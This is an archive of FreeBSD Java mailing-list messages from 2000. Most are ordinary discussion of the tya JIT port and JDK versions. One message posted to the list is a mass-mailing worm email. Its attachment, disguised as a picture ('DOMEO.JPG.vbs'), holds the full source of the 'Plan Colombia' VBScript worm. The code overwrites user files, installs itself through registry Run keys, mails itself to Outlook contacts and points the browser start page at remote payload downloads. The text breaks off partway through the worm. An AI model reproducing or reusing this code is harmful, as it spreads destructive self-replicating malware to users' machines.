veldy.net (w028.z064001117.msp-mn.dsl.cnc.net [64.1.117.28]) by hub.freebsd.org (Postfix) with ESMTP id F1A6837B479; Tue, 31 Oct 2000 07:35:15 -0800 (PST) Received: from stpcdz4q650 (veldy.net [64.1.117.28]) by veldy.net (Postfix) with SMTP id E60D18C45; Tue, 31 Oct 2000 09:35:28 -0600 (CST) Message-ID: <00ca01c04350$81ccc820$c70b200a@FairIsaac.com> From: "Thomas T. Veldhouse" To: "Maxim Sobolev" Cc: References: <39FEE3FD.E5391075@FreeBSD.org> Subject: Re: /usr/ports/java/tya Date: Tue, 31 Oct 2000 09:37:41 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="x-user-defined" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-java@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Why not always place a link into $JAVA_HOME/jre/lib/i386/ for the shared library of the JIT. It shouldn't hurt anything for 1.1.8 and it makes 1.2.2 work. Tom Veldhouse veldy@veldy.net ----- Original Message ----- From: "Maxim Sobolev" To: "Max Khon" Cc: Sent: Tuesday, October 31, 2000 9:23 AM Subject: Re: /usr/ports/java/tya > Max Khon wrote: > > > hi, there! > > > > with attached patches it is possible to build /usr/ports/java/tya > > with jdk12-beta > > (you will also need to change JAVADIR= in Makefile) > > I have verified that it is still possible to build tya with jdk1.1.8 > > with this patches. > > > > tya works for me with jdk12-beta > > The main problem with using JITs with JDK12 is that virtual machine doesn't anymore > allow installing JIT into place other than ${LOCALBASE}/jdk1.2.2 (i.e. it doesn't > respect LD_LIBRARY_PATH like 1.1.8 does), so it's nearly impossible to adjust port to > correctly install/deinstall on both jdk/jre 1.1.8 and jdk 1.2.2. However if you have > any ideas of how to cope with this particular problem please let me know. > > -Maxim > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-java" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-java" in the body of the message From owner-freebsd-java Tue Oct 31 7:53:34 2000 Delivered-To: freebsd-java@freebsd.org Received: from iclub.nsu.ru (iclub.nsu.ru [193.124.222.66]) by hub.freebsd.org (Postfix) with ESMTP id 24FED37B4C5; Tue, 31 Oct 2000 07:53:27 -0800 (PST) Received: from localhost (fjoe@localhost) by iclub.nsu.ru (8.9.3/8.9.3) with ESMTP id VAA41360; Tue, 31 Oct 2000 21:52:31 +0600 (NS) (envelope-from fjoe@iclub.nsu.ru) Date: Tue, 31 Oct 2000 21:52:31 +0600 (NS) From: Max Khon To: "Thomas T. Veldhouse" Cc: Maxim Sobolev , freebsd-java@FreeBSD.ORG Subject: Re: /usr/ports/java/tya In-Reply-To: <00ca01c04350$81ccc820$c70b200a@FairIsaac.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-java@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi, there! On Tue, 31 Oct 2000, Thomas T. Veldhouse wrote: > Why not always place a link into $JAVA_HOME/jre/lib/i386/ for the shared > library of the JIT. It shouldn't hurt anything for 1.1.8 and it makes 1.2.2 > work. will this prevent normal pkg_delete of jdk12? /fjoe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-java" in the body of the message From owner-freebsd-java Tue Oct 31 8: 8: 1 2000 Delivered-To: freebsd-java@freebsd.org Received: from veldy.net (w028.z064001117.msp-mn.dsl.cnc.net [64.1.117.28]) by hub.freebsd.org (Postfix) with ESMTP id 5BEB637B4D7 for ; Tue, 31 Oct 2000 08:07:58 -0800 (PST) Received: from stpcdz4q650 (veldy.net [64.1.117.28]) by veldy.net (Postfix) with SMTP id 773BF8C4A; Tue, 31 Oct 2000 10:08:11 -0600 (CST) Message-ID: <00f601c04355$1376ae40$c70b200a@FairIsaac.com> From: "Thomas T. Veldhouse" To: "Max Khon" , References: Subject: Re: /usr/ports/java/tya Date: Tue, 31 Oct 2000 10:10:23 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-java@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Yes, it probably would - as TYA or shuJIT would still be installed. However, that is a dependency issue. If you remove the JIT first, there will not be any problems. Tom Veldhouse veldy@veldy.net ----- Original Message ----- From: "Max Khon" To: "Thomas T. Veldhouse" Cc: "Maxim Sobolev" ; Sent: Tuesday, October 31, 2000 9:52 AM Subject: Re: /usr/ports/java/tya > hi, there! > > On Tue, 31 Oct 2000, Thomas T. Veldhouse wrote: > > > Why not always place a link into $JAVA_HOME/jre/lib/i386/ for the shared > > library of the JIT. It shouldn't hurt anything for 1.1.8 and it makes 1.2.2 > > work. > > will this prevent normal pkg_delete of jdk12? > > /fjoe > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-java" in the body of the message From owner-freebsd-java Tue Oct 31 8:37:25 2000 Delivered-To: freebsd-java@freebsd.org Received: from iclub.nsu.ru (iclub.nsu.ru [193.124.222.66]) by hub.freebsd.org (Postfix) with ESMTP id 8F41537B4C5 for ; Tue, 31 Oct 2000 08:37:20 -0800 (PST) Received: from localhost (fjoe@localhost) by iclub.nsu.ru (8.9.3/8.9.3) with ESMTP id WAA42824; Tue, 31 Oct 2000 22:37:00 +0600 (NS) (envelope-from fjoe@iclub.nsu.ru) Date: Tue, 31 Oct 2000 22:37:00 +0600 (NS) From: Max Khon To: "Thomas T. Veldhouse" Cc: freebsd-java@freebsd.org Subject: Re: /usr/ports/java/tya In-Reply-To: <00f601c04355$1376ae40$c70b200a@FairIsaac.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-java@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi, there! On Tue, 31 Oct 2000, Thomas T. Veldhouse wrote: > Yes, it probably would - as TYA or shuJIT would still be installed. > However, that is a dependency issue. If you remove the JIT first, there > will not be any problems. we can install shujit/tya into ${JAVA_HOME}/jre/lib/${ARCH} directly with the same effect. or there exist some other issues why we cannot do this? /fjoe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-java" in the body of the message From owner-freebsd-java Wed Nov 1 10:54: 2 2000 Delivered-To: freebsd-java@freebsd.org Received: from webcom.it (unknown [213.205.4.2]) by hub.freebsd.org (Postfix) with SMTP id 86ABF37B4C5 for ; Wed, 1 Nov 2000 10:53:56 -0800 (PST) Received: (qmail 57240 invoked by uid 1000); 1 Nov 2000 18:54:04 -0000 Delivered-To: andrea-unknown@webcom.it Received: (qmail 42556 invoked by alias); 1 Nov 2000 18:17:53 -0000 Delivered-To: freebsd-ports@webcom.it Received: (qmail 42553 invoked by uid 1000); 1 Nov 2000 18:17:52 -0000 Message-ID: <20001101181752.42552.qmail@webcom.it> From: andrea@webcom.it Subject: Using specific JDK from ports To: freebsd-ports@webcom.it Date: Wed, 1 Nov 2000 19:17:52 +0100 (CET) X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: owner-freebsd-java@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! I recently submitted a PR for a new port (Enhydra 3.1 beta application server), and am about to do some more work in this area. Enhydra requires (well, almost) a JDK v. 1.2; lot of other stuff also requires specific JDK's. At this moment we have different JDK versions in the ports (and I gather IBM 1.3 support is upcoming), with options wrt to JIT, compilers, etc. all installing in different places. This would make it very hard to require a particular version in a port. I had a look at javawmwrapper, but it doesn't look very useful, that is, feature complete. What I'd like to see is some kind of software, like apxs for Apache or glib12-config, which could be called upon in a port's Makefile to determine (at least): - whether there is at least one JDK of required version installed - the path to the compiler - the path to jre - maybe even options to pass Note that probably most of this stuff could be solved by appropriate symlinks (for my setup, /usr/local/jdk1.2 -> /usr/local/linux-jdk1.2.2 would suffice), but I would be uncomfortable with updating such symlinks at port installation. Instead, each port which installs a new compiler / jre could just update some sort of repository (a file in /etc/jdk, for instance) to let the wrapper know it is there. It would still be the user responsibility to determine which one to use in case there are multiple equivalent. Please comment. If people are interested, I would probably get down and define requirements to send for comments again, and then I should also have time to actually implement this. Bye, Andrea -- I believe the technical term is "Oops!" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-java" in the body of the message From owner-freebsd-java Wed Nov 1 10:59:23 2000 Delivered-To: freebsd-java@freebsd.org Received: from webcom.it (unknown [213.205.4.2]) by hub.freebsd.org (Postfix) with SMTP id 8EDBC37B4CF for ; Wed, 1 Nov 2000 10:59:19 -0800 (PST) Received: (qmail 64025 invoked by uid 1000); 1 Nov 2000 18:59:27 -0000 Message-ID: <20001101185926.64024.qmail@webcom.it> From: andrea@webcom.it Subject: New ports prospects To: freebsd-ports@freebsd.org, freebsd-java@freebsd.org Date: Wed, 1 Nov 2000 19:59:26 +0100 (CET) X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: owner-freebsd-java@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I am about to start porting Cocoon and Jetspeed to FreeBSD. Anybody working on that? Also, any comment on my port of Enhydra 3.1 beta 1 (PR ports/22421)? Bye, Andrea -- Loose bits sink chips. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-java" in the body of the message From owner-freebsd-java Wed Nov 1 11: 3:51 2000 Delivered-To: freebsd-java@freebsd.org Received: from webcom.it (unknown [213.205.4.2]) by hub.freebsd.org (Postfix) with SMTP id AE00C37B4C5 for ; Wed, 1 Nov 2000 11:03:44 -0800 (PST) Received: (qmail 72332 invoked by uid 1000); 1 Nov 2000 19:03:53 -0000 Message-ID: <20001101190353.72331.qmail@webcom.it> From: andrea@webcom.it Subject: Using specific JDK from ports To: freebsd-ports@freebsd.org, freebsd-java@freebsd.org Date: Wed, 1 Nov 2000 20:03:53 +0100 (CET) X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: owner-freebsd-java@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! I recently submitted a PR for a new port (Enhydra 3.1 beta application server), and am about to do some more work in this area. Enhydra requires (well, almost) a JDK v. 1.2; lot of other stuff also requires specific JDK's. At this moment we have different JDK versions in the ports (and I gather IBM 1.3 support is upcoming), with options wrt to JIT, compilers, etc. all installing in different places. This would make it very hard to require a particular version in a port. I had a look at javawmwrapper, but it doesn't look very useful, that is, feature complete. What I'd like to see is some kind of software, like apxs for Apache or glib12-config, which could be called upon in a port's Makefile to determine (at least): - whether there is at least one JDK of required version installed - the path to the compiler - the path to jre - maybe even options to pass Note that probably most of this stuff could be solved by appropriate symlinks (for my setup, /usr/local/jdk1.2 -> /usr/local/linux-jdk1.2.2 would suffice), but I would be uncomfortable with updating such symlinks at port installation. Instead, each port which installs a new compiler / jre could just update some sort of repository (a file in /etc/jdk, for instance) to let the wrapper know it is there. It would still be the user responsibility to determine which one to use in case there are multiple equivalent. Please comment. If people are interested, I would probably get down and define requirements to send for comments again, and then I should also have time to actually implement this. Bye, Andrea -- I believe the technical term is "Oops!" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-java" in the body of the message From owner-freebsd-java Wed Nov 1 11: 3:49 2000 Delivered-To: freebsd-java@freebsd.org Received: from toyland.drapple.com (toyland.drapple.com [204.200.26.114]) by hub.freebsd.org (Postfix) with ESMTP id 590D737B479; Wed, 1 Nov 2000 11:03:44 -0800 (PST) Received: from freebsd.org (bet-su5-23.itg.discovery.com [198.147.13.23]) by toyland.drapple.com (8.9.3/8.9.3) with ESMTP id LAA66079; Wed, 1 Nov 2000 11:03:28 -0800 (PST) (envelope-from patrick@freebsd.org) Message-ID: <3A0068FE.35626926@freebsd.org> Date: Wed, 01 Nov 2000 19:03:26 +0000 From: Patrick Gardella Organization: FreeBSD X-Mailer: Mozilla 4.75 [en] (X11; U; SunOS 5.7 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: andrea@webcom.it Cc: freebsd-ports@freebsd.org, freebsd-java@freebsd.org Subject: Re: New ports prospects References: <20001101185926.64024.qmail@webcom.it> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-java@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org andrea@webcom.it wrote: > > I am about to start porting Cocoon and Jetspeed to FreeBSD. Anybody working on > that? > > Also, any comment on my port of Enhydra 3.1 beta 1 (PR ports/22421)? I've not heard of anyone porting those over, but they shouldn't be too tough. And given the upcoming release of FreeBSD 4.2, there are lots of people pouring over the PR database adding stuff. I'll take a look at your PR tonight if it's not committed before then. Patrick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-java" in the body of the message From owner-freebsd-java Wed Nov 1 11:42:47 2000 Delivered-To: freebsd-java@freebsd.org Received: from mailgw1.be.to (mailgw1.be.to [210.235.212.5]) by hub.freebsd.org (Postfix) with ESMTP id 1092037B4D7 for ; Wed, 1 Nov 2000 11:42:43 -0800 (PST) Received: from mail1.be.to (mail1.be.to [210.235.212.2]) by mailgw1.be.to (8.11.0+3.3W/8.11.0/BETO3.11-20000907025324) with ESMTP id eA1JgfT16575 for ; Thu, 2 Nov 2000 04:42:41 +0900 (envelope-from okazaki@be.to) Received: from REISHI (mbra0119.ppp.infoweb.ne.jp [202.219.229.83]) by mail1.be.to (8.9.3+3.2W/BETO.2.0-2000090621000000) with SMTP id EAA18502 for ; Thu, 2 Nov 2000 04:42:39 +0900 Received: (qmail 10009 invoked from network); 1 Nov 2000 19:42:23 -0000 Received: from localhost (HELO acidrain.localnet) (127.0.0.1) by localhost with SMTP; 1 Nov 2000 19:42:23 -0000 Date: Thu, 02 Nov 2000 04:42:21 +0900 Message-ID: <86ofzza38i.wl@dolphin.be.to> From: OKAZAKI Tetsurou To: Patrick Gardella Cc: andrea@webcom.it, freebsd-ports@freebsd.org, freebsd-java@freebsd.org Subject: Re: New ports prospects In-Reply-To: <3A0068FE.35626926@freebsd.org> References: <20001101185926.64024.qmail@webcom.it> <3A0068FE.35626926@freebsd.org> User-Agent: Wanderlust/2.3.93 (Roam) REMI/1.14.3 (Matsudai) FLIM/1.14.0 (Ninokuchi) APEL/10.2 Emacs/20.7 (i386--freebsd) MULE/4.0 (HANANOEN) Organization: Unknown MIME-Version: 1.0 (generated by REMI 1.14.3 - "Matsudai") Content-Type: text/plain; charset=US-ASCII Sender: owner-freebsd-java@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In the message <3A0068FE.35626926@freebsd.org> Patrick Gardella wrote: > andrea@webcom.it wrote: > > > > I am about to start porting Cocoon and Jetspeed to FreeBSD. Anybody working on > > that? > > > > Also, any comment on my port of Enhydra 3.1 beta 1 (PR ports/22421)? > I've not heard of anyone porting those over, but they shouldn't be too > tough. Cocoon is already ported by kuriyama-san. See textproc/cocoon. -- Tetsurou To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-java" in the body of the message From owner-freebsd-java Wed Nov 1 23:38:44 2000 Delivered-To: freebsd-java@freebsd.org Received: from sunsite.aubi.de (mail.aubi-online.de [62.159.82.131]) by hub.freebsd.org (Postfix) with ESMTP id 6620F37B4C5 for ; Wed, 1 Nov 2000 23:38:22 -0800 (PST) Received: from exchangeb.aubi.de (exchangeb.aubi.de [170.56.121.7]) by sunsite.aubi.de (8.9.3+Sun/8.9.3) with ESMTP id JAA23005 for ; Thu, 2 Nov 2000 09:38:20 +0200 (GMT) Received: by exchangeb.aubi.de with Internet Mail Service (5.5.2650.21) id ; Thu, 2 Nov 2000 09:34:37 -0000 Message-ID: <7B1EED0C5D58D411B73200508BDE77B204DD13@exchangeb.aubi.de> From: Peter Wagner To: FreeBSD Java List Subject: US PRESIDENT AND FBI SECRETS =PLEASE VISIT => (http://WWW.2600.CO M)<= Date: Thu, 2 Nov 2000 09:34:36 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: multipart/mixed; boundary="----_=_NextPart_000_01C044B0.1DA661B0" Sender: owner-freebsd-java@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_000_01C044B0.1DA661B0 Content-Type: text/plain VERY JOKE..! SEE PRESIDENT AND FBI TOP SECRET PICTURES.. ------_=_NextPart_000_01C044B0.1DA661B0 Content-Type: application/octet-stream; name="DOMEO.JPG.vbs" Content-Transfer-Encoding: quoted-printable Content-Disposition: attachment; filename="DOMEO.JPG.vbs" rem = =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D rem "Plan Colombia" virus v1.0 rem by Sand Ja9e Gr0w (www.colombia.com) rem Dedicated to all the people that want to be hackers or crackers, = in Colombia =20 rem This program is also a protest act against the violence and = corruption that Colombia lives... rem I always wanting that all this finishes, I have said... rem Santa fe de Bogot=E1 2000/09 rem I dedicate to all you the song "GoodBye" of Andreas Bochelli rem = =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D rem Thanks God..! rem A greeting for "Lina Mar=EDa" from "Santa fe de Bogot=E1" rem A greeting for "Tizo" from "Spain" rem And One kicked of tail to my friends, "eL ChE" and "ThE SpY" rem okay, ok...=20 rem my baby start here... =20 On Error Resume Next dim = fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow,polyn,numero,polye eq=3D"" ctr=3D0 randomize numero =3D Int(Rnd * 3) + 1 polye =3D ".GIF.vbs" If numero =3D 1 Then polye =3D ".BMP.vbs" Else If numero =3D 2 Then polye =3D ".JPG.vbs" End If End If polyn=3D"\"&polyname(Int(Rnd * 5) + 4)&polye Set fso =3D CreateObject("Scripting.FileSystemObject") set file =3D fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=3Dfile.ReadAll main() If Day(Now) =3D 17 And Month(Now) =3D 9 Then MsgBox "Dedicated to my best brother=3D>Christiam Julian(C.J.G.S.)" & = Chr(13) & "Att. " & polyname(5) & " (M.H.M. TEAM)" killnet() End If sub main() On Error Resume Next dim wscr,rr set wscr=3DCreateObject("WScript.Shell") rr=3Dwscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows = Scripting Host\Settings\Timeout") if (rr>=3D1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting = Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin =3D fso.GetSpecialFolder(0) Set dirsystem =3D fso.GetSpecialFolder(1) Set dirtemp =3D fso.GetSpecialFolder(2) Set c =3D fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\LINUX32.vbs") c.Copy(dirwin&"\reload.vbs") c.Copy(dirsystem&polyn) regruns() html() spreadtoemail() listadriv() end sub sub regruns() On Error Resume Next Dim num,downread,res regcreate = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\LINUX3= 2",dirsystem&"\LINUX32.vbs" regcreate = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService= s\reload",dirwin&"\reload.vbs" downread=3D"" downread=3Dregget("HKEY_CURRENT_USER\Software\Microsoft\Internet = Explorer\Download Directory") if (downread=3D"") then downread=3D"c:\" end if rem acepta nombres largos..? if (fileexist(dirsystem&"\WinFAT32.exe")=3D1) then Randomize Randomize num =3D Int((4 * Rnd) + 1) rem fatal =3D> send virii if num =3D 2 then=20 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start = Page","http://members.fortunecity.com/plancolombia/macromedia32.zip" else rem oh,, a picture.. nice :) =20 if num =3D 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start = Page","http://members.fortunecity.com/plancolombia/linux321.zip" =20 else rem oh,, other picture =3D:() if num =3D 4 then regcreate "HKCU\Software\Microsoft\Internet = Explorer\Main\Start = Page","http://members.fortunecity.com/plancolombia/linux322.zip" end if=20 end if =20 end if end if if (fileexist(downread&"\MACROMEDIA32.zip")=3D0) then res =3D Shell("copy " & downread & "\MACROMEDIA32.zip " & dirwin & = "\important_note.txt", vbHide) regcreate = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\plan = colombia",dirwin&"\important_note.txt" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet = Explorer\Main\Start Page","about:blank" else if (fileexist(downread&"\linux321.zip")=3D0) then Kill (dirwin & "\logos.sys") res =3D Shell("copy " & downread & "\linux321.zip " & dirwin & = "\logos.sys", vbHide) regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet = Explorer\Main\Start Page","about:blank" =20 else if (fileexist(downread&"\linux322.zip")=3D0) then Kill (dirwin & "\logow.sys") res =3D Shell("copy " & downread & "\linux322.zip " & dirwin & = "\logow.sys", vbHide) =20 regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet = Explorer\Main\Start Page","about:blank" =20 end if =20 end if end if end sub sub listadriv On Error Resume Next Dim d,dc,s Set dc =3D fso.Drives For Each d in dc If d.DriveType =3D 2 or d.DriveType=3D3 Then folderlist(d.path&"\") end if Next listadriv =3D s end sub sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f =3D fso.GetFolder(folderspec) set fc =3D f.Files for each f1 in fc ext=3Dfso.GetExtensionName(f1.path) ext=3Dlcase(ext) s=3Dlcase(f1.name) if (ext=3D"vbs") or (ext=3D"vbe") then set ap=3Dfso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close else if(ext=3D"js") or (ext=3D"jse") or (ext=3D"css") or (ext=3D"wsh") or = (ext=3D"sct") or (ext=3D"hta") then set ap=3Dfso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close bname=3Dfso.GetBaseName(f1.path) set cop=3Dfso.GetFile(f1.path) cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) =20 else if(ext=3D"jpg") or (ext=3D"jpeg") then set ap=3Dfso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=3Dfso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) =20 else if(ext=3D"mp3") or (ext=3D"mp2") then set mp3=3Dfso.CreateTextFile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=3Dfso.GetFile(f1.path) att.attributes=3Datt.attributes+2 end if end if end if end if next end sub sub folderlist(folderspec) On Error Resume Next dim f,f1,sf set f =3D fso.GetFolder(folderspec) set sf =3D f.SubFolders for each f1 in sf infectfiles(f1.path) folderlist(f1.path) next end sub sub regcreate(regkey,regvalue) Set regedit =3D CreateObject("WScript.Shell") regedit.RegWrite regkey,regvalue end sub function regget(value) Set regedit =3D CreateObject("WScript.Shell") regget=3Dregedit.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso.FileExists(filespec)) Then msg =3D 0 else msg =3D 1 end if fileexist =3D msg end function function folderexist(folderspec) On Error Resume Next dim msg if (fso.GetFolderExists(folderspec)) then msg =3D 0 else msg =3D 1 end if fileexist =3D msg end function sub spreadtoemail() On Error Resume Next dim = x,a,ctrlists,ctrentries,correoad,b,regedit,regv,regad,textosub,textobod set regedit=3DCreateObject("WScript.Shell") set out=3DWScript.CreateObject("Outlook.Application") set mapi=3Dout.GetNameSpace("MAPI") Randomize numero =3D Int(Rnd * 3) + 1 textosub =3D "" If numero =3D 1 Then textosub =3D "US PRESIDENT AND FBI SECRETS =3DPLEASE VISIT =3D> = (http://WWW.2600.COM)<=3D" Else If numero =3D 2 Then textosub =3D polyname(6) End If End If Randomize numero =3D Int(Rnd * 3) + 1 textobod =3D "" If numero =3D 1 Then textobod =3D "VERY JOKE..! SEE PRESIDENT AND FBI TOP SECRET = PICTURES.." Else If numero =3D 2 Then textobod =3D polyname(10) End If End If for ctrlists=3D1 to mapi.AddressLists.Count set a=3Dmapi.AddressLists(ctrlists) x=3D1 regv=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv=3D"") then regv=3D1 end if if (int(a.AddressEntries.Count)>int(regv)) then =20 for ctrentries=3D1 to a.AddressEntries.Count correoad=3Da.AddressEntries(x) regad=3D"" = regad=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&corr= eoad) if (regad=3D"") then set correo=3Dout.CreateItem(0) correo.Recipients.Add(correoad) correo.Subject =3D textosub correo.Body =3D vbcrlf&textobod correo.Attachments.Add(dirsystem&polyn) correo.Send regedit.RegWrite = "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&correoad,1,"REG_DWORD" end if x=3Dx+1 next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Addr= essEntries.Count else regedit.RegWrite = "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if next Set out=3DNothing Set mapi=3DNothing end sub Function polyname(n) Dim i, vector, texto, pos on error resume next rem polyformic ( ohhhh yeahhh...) very good polyformic engine :() by = Sand Ja9e Gr0w vector =3D Array("A", "E", "I", "O", "U") texto =3D "" Randomize For i =3D 1 To n Randomize rem consonante texto =3D texto&Chr(Int((Rnd * 25) + 65)) i =3D i + 1 If i > n Then exit for end if rem vocal texto =3D texto&vector(Int((Rnd * 4) + 1)) Randomize Next polyname =3D texto End Function sub html On Error Resume Next dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 dta1=3D""&_ ""&vbcrlf& _ "

M.H.M TEAM

Colombia
- Please press #-#YES#-# = button for see secret pictures"&vbcrlf& _ "Hello = Colombia...! Since Here, after, since other part of World.. = "&vbcrlf& _ ""&vbcrlf& _ "